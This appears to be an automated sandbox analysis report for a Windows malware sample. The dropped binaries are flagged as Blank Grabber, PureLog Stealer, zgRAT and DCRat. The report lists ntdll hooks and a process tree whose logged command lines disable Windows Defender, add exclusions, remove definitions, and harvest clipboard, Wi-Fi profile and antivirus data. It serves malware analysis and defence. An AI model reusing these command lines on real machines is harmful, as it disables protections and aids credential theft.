2024-08-01 02:28:10 UTC	16384	OUT	Data Raw: 32 f1 71 36 f3 d6 c8 e8 03 5b a4 36 03 6d f8 45 e4 5c 93 c3 88 32 e4 e2 7e 89 18 8a 34 0b 0b 09 fa fb 88 d7 30 c3 91 1c 01 c9 f4 db 36 7c 05 01 31 b3 21 02 3d cf 35 ca 33 ff ed 14 d7 c1 94 ff 1d b9 f5 87 94 26 6e 00 b1 2d 0f 60 c2 77 6c ee 6d e1 7e c0 39 99 87 ac 0d 43 c7 fb 29 8f a2 c7 a8 43 42 8c 6d e6 63 cc b1 a2 af d6 cf 24 73 ac 6e a3 d7 6c db b0 c3 a7 21 5e 1e cc ae a5 6a 11 76 9e d8 c4 2a 8d 2a a3 79 d8 f1 6d 3b 6f bd b6 2d 4f b1 71 b6 d7 90 81 31 76 ab 64 d4 c3 b4 3a 31 af 9d c5 f9 63 d1 52 17 c6 23 b0 16 15 a8 bc 51 2a cd af 38 f2 3f 45 7c 70 c0 d4 ae 24 d3 17 87 6c 8b 40 e2 57 f4 37 f6 61 8b 75 9e f0 6c 00 c2 82 73 2b 2b d9 56 ce d8 bb 7d 4f 26 c2 8c 96 d0 6e 12 b5 53 da eb f3 6d df 59 d5 de b1 e3 41 98 57 6f 6c 33 5b 9e 45 1a 27 7f f0 9a c3 ec Data Ascii: 2q6[6mE\2~406\|1!=53&n-`wlm~9C)CBmc$snl!^jv*ym;o-Oq1vd:1cR#Q8?E\|p$l@W7auls++V}O&nSmYAWol3[E'
2024-08-01 02:28:11 UTC	389	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Thu, 01 Aug 2024 02:28:11 GMT Content-Type: application/json Content-Length: 1730 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
ZwEnumerateKey	INLINE	explorer.exe, winlogon.exe
NtQuerySystemInformation	INLINE	explorer.exe, winlogon.exe
ZwResumeThread	INLINE	explorer.exe, winlogon.exe
NtDeviceIoControlFile	INLINE	explorer.exe, winlogon.exe
ZwDeviceIoControlFile	INLINE	explorer.exe, winlogon.exe
NtEnumerateKey	INLINE	explorer.exe, winlogon.exe
NtQueryDirectoryFile	INLINE	explorer.exe, winlogon.exe
ZwEnumerateValueKey	INLINE	explorer.exe, winlogon.exe
ZwQuerySystemInformation	INLINE	explorer.exe, winlogon.exe
NtResumeThread	INLINE	explorer.exe, winlogon.exe
RtlGetNativeSystemInformation	INLINE	explorer.exe, winlogon.exe
NtQueryDirectoryFileEx	INLINE	explorer.exe, winlogon.exe
NtEnumerateValueKey	INLINE	explorer.exe, winlogon.exe
ZwQueryDirectoryFileEx	INLINE	explorer.exe, winlogon.exe
ZwQueryDirectoryFile	INLINE	explorer.exe, winlogon.exe

Processes

Process: explorer.exe, Module: ntdll.dll

Function Name	Hook Type	New Data
ZwEnumerateKey	INLINE	0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQuerySystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
ZwResumeThread	INLINE	0xE9 0x9A 0xA3 0x32 0x27 0x7F
NtDeviceIoControlFile	INLINE	0xE9 0x90 0x03 0x33 0x34 0x4F
ZwDeviceIoControlFile	INLINE	0xE9 0x90 0x03 0x33 0x34 0x4F
NtEnumerateKey	INLINE	0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQueryDirectoryFile	INLINE	0xE9 0x9A 0xA3 0x32 0x2B 0xBF
ZwEnumerateValueKey	INLINE	0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQuerySystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtResumeThread	INLINE	0xE9 0x9A 0xA3 0x32 0x27 0x7F
RtlGetNativeSystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtQueryDirectoryFileEx	INLINE	0xE9 0x97 0x73 0x30 0x0A 0xAF
NtEnumerateValueKey	INLINE	0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQueryDirectoryFileEx	INLINE	0xE9 0x97 0x73 0x30 0x0A 0xAF
ZwQueryDirectoryFile	INLINE	0xE9 0x9A 0xA3 0x32 0x2B 0xBF

Process: winlogon.exe, Module: ntdll.dll

Function Name	Hook Type	New Data
ZwEnumerateKey	INLINE	0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQuerySystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
ZwResumeThread	INLINE	0xE9 0x9A 0xA3 0x32 0x27 0x7F
NtDeviceIoControlFile	INLINE	0xE9 0x90 0x03 0x33 0x34 0x4F
ZwDeviceIoControlFile	INLINE	0xE9 0x90 0x03 0x33 0x34 0x4F
NtEnumerateKey	INLINE	0xE9 0x9C 0xC3 0x32 0x2C 0xCF
NtQueryDirectoryFile	INLINE	0xE9 0x9A 0xA3 0x32 0x2B 0xBF
ZwEnumerateValueKey	INLINE	0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQuerySystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtResumeThread	INLINE	0xE9 0x9A 0xA3 0x32 0x27 0x7F
RtlGetNativeSystemInformation	INLINE	0xE9 0x9C 0xC3 0x32 0x2A 0xAF
NtQueryDirectoryFileEx	INLINE	0xE9 0x97 0x73 0x30 0x0A 0xAF
NtEnumerateValueKey	INLINE	0xE9 0x90 0x03 0x33 0x31 0x1F
ZwQueryDirectoryFileEx	INLINE	0xE9 0x97 0x73 0x30 0x0A 0xAF
ZwQueryDirectoryFile	INLINE	0xE9 0x9A 0xA3 0x32 0x2B 0xBF

Target ID:	0
Start time:	22:26:57
Start date:	31/07/2024
Path:	C:\Users\user\Desktop\8Ck8T5qRcC.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\8Ck8T5qRcC.exe"
Imagebase:	0xd90000
File size:	17'830'453 bytes
MD5 hash:	4FEC8FAF6590F62034AD44A54175B9E9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	22:26:59
Start date:	31/07/2024
Path:	C:\ProgramData\Microsoft\hacn.exe
Wow64 process (32bit):	false
Commandline:	"C:\ProgramData\Microsoft\hacn.exe"
Imagebase:	0x7ff67d000000
File size:	11'662'615 bytes
MD5 hash:	FC445049713C02F9A9DDAA62E404C9E9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 71%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	22:26:59
Start date:	31/07/2024
Path:	C:\ProgramData\Microsoft\based.exe
Wow64 process (32bit):	false
Commandline:	"C:\ProgramData\Microsoft\based.exe"
Imagebase:	0x7ff727260000
File size:	6'127'126 bytes
MD5 hash:	838A5BD59DE32F425938CBA6C119CBEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000003.1686411097.000001F919A15000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000003.1686411097.000001F919A13000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 55%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	22:27:01
Start date:	31/07/2024
Path:	C:\ProgramData\Microsoft\hacn.exe
Wow64 process (32bit):	false
Commandline:	"C:\ProgramData\Microsoft\hacn.exe"
Imagebase:	0x7ff67d000000
File size:	11'662'615 bytes
MD5 hash:	FC445049713C02F9A9DDAA62E404C9E9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	22:27:01
Start date:	31/07/2024
Path:	C:\ProgramData\Microsoft\based.exe
Wow64 process (32bit):	false
Commandline:	"C:\ProgramData\Microsoft\based.exe"
Imagebase:	0x7ff727260000
File size:	6'127'126 bytes
MD5 hash:	838A5BD59DE32F425938CBA6C119CBEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000004.00000002.2382322398.00000201D0640000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2382322398.00000201D0640000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	22:27:01
Start date:	31/07/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe -pbeznogym
Imagebase:	0x7ff6c0ae0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	22:27:01
Start date:	31/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	22:27:01
Start date:	31/07/2024
Path:	C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe -pbeznogym
Imagebase:	0xd80000
File size:	6'361'390 bytes
MD5 hash:	E5DB23B3AAF4DDDD2BAF96FB7BBA9616
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000007.00000003.1702500179.00000000076F5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 21%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	22:27:04
Start date:	31/07/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'"
Imagebase:	0x7ff6c0ae0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	22:27:04
Start date:	31/07/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Imagebase:	0x7ff6c0ae0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	22:27:04
Start date:	31/07/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr'"
Imagebase:	0x7ff6c0ae0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	22:27:04
Start date:	31/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	22:27:04
Start date:	31/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	22:27:04
Start date:	31/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	22:27:04
Start date:	31/07/2024
Path:	C:\ProgramData\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\ProgramData\svchost.exe"
Imagebase:	0x160000
File size:	4'042'529 bytes
MD5 hash:	45C59202DCE8ED255B4DBD8BA74C630F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000E.00000003.1722014407.0000000005600000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000E.00000003.1722722653.0000000004E00000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\ProgramData\svchost.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ProgramData\svchost.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 61%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	22:27:04
Start date:	31/07/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	22:27:04
Start date:	31/07/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr'
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	22:27:04
Start date:	31/07/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	22:27:04
Start date:	31/07/2024
Path:	C:\ProgramData\setup.exe
Wow64 process (32bit):	false
Commandline:	"C:\ProgramData\setup.exe"
Imagebase:	0x7ff7fc930000
File size:	5'617'152 bytes
MD5 hash:	1274CBCD6329098F79A3BE6D76AB8B97
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 71%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	22:27:05
Start date:	31/07/2024
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe"
Imagebase:	0x560000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	22:27:05
Start date:	31/07/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Imagebase:	0x7ff70f330000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	22:27:05
Start date:	31/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	22:27:05
Start date:	31/07/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:	0x7ff6c0ae0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	22:27:05
Start date:	31/07/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:	0x7ff6c0ae0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	22:27:05
Start date:	31/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	22:27:05
Start date:	31/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	22:27:07
Start date:	31/07/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\oGgyulsi03j6EO3sjCC.bat" "
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	22:27:07
Start date:	31/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	22:27:08
Start date:	31/07/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FO LIST
Imagebase:	0x7ff72c810000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	22:27:08
Start date:	31/07/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FO LIST
Imagebase:	0x7ff72c810000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	22:27:08
Start date:	31/07/2024
Path:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor/ChainComServermonitor.exe"
Imagebase:	0x4b0000
File size:	3'720'704 bytes
MD5 hash:	5FE249BBCC644C6F155D86E8B3CC1E12
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001E.00000000.1761622309.00000000004B2000.00000002.00000001.01000000.00000023.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001E.00000002.1949562045.00000000128C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, Author: Joe Security
Antivirus matches:	Detection: 92%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	22:27:09
Start date:	31/07/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
Imagebase:	0x7ff6c0ae0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	22:27:09
Start date:	31/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	22:27:09
Start date:	31/07/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
Imagebase:	0x7ff6c0ae0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	22:27:09
Start date:	31/07/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:	0x7ff6c0ae0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	22:27:09
Start date:	31/07/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
Imagebase:	0x7ff6c0ae0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	22:27:09
Start date:	31/07/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff6c0ae0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	22:27:09
Start date:	31/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	22:27:09
Start date:	31/07/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "systeminfo"
Imagebase:	0x7ff6c0ae0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	22:27:09
Start date:	31/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	22:27:09
Start date:	31/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	22:27:09
Start date:	31/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	22:27:09
Start date:	31/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	22:27:11
Start date:	31/07/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Imagebase:	0x7ff699260000
